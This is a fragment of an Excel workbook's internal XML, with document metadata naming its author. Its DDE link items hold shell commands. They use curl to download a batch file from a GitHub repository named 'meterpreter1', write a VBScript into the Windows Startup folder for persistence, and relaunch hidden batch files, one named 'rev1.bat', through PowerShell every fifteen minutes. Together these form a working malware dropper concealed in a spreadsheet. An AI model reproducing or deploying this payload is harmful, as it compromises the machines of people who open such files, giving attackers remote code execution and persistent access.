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C9D8D2-7C0C-4CA8-85DC-1516EF055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Do &gt; &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs&quot;">
    <ddeItems>
      <ddeItem name="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Set objShell = CreateObject(&quot;WScript.Shell&quot;) &gt;&gt; &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs&quot;">
    <ddeItems>
      <ddeItem name="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powershell -WindowStyle Hidden -Command Start-Process -FilePath %temp%\nihbtdtdow1.bat -WindowStyle Hidden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powershell -c Start-Process -FilePath %temp%\rev1.bat -WindowStyle Hidden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Wscript.Sleep 900000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Loop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start /b wscript //B //NoLogo &quot;%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.vbs&quot;">
    <ddeItems>
      <ddeItem name="nm.A1" advise="1"/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cmd /c curl https://raw.githubusercontent.com/0x2034/meterpreter1/main/nihbtdtdow1.bat -o %temp%\nihbtdtdow1.bat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e" cm="1">
        <f t="array" ref="A1">[1]!nm.A1&amp;[2]!nm.A1&amp;[8]!nm.A1&amp;[3]!nm.A1&amp;[4]!nm.A1&amp;[5]!nm.A1&amp;[6]!nm.A1&amp;[7]!nm.A1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Samy</dc:creator>
  <cp:lastModifiedBy>Omar Samy</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:17:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-27T16:26:16Z</dcterms:modified>
</cp:coreProperties>
</file>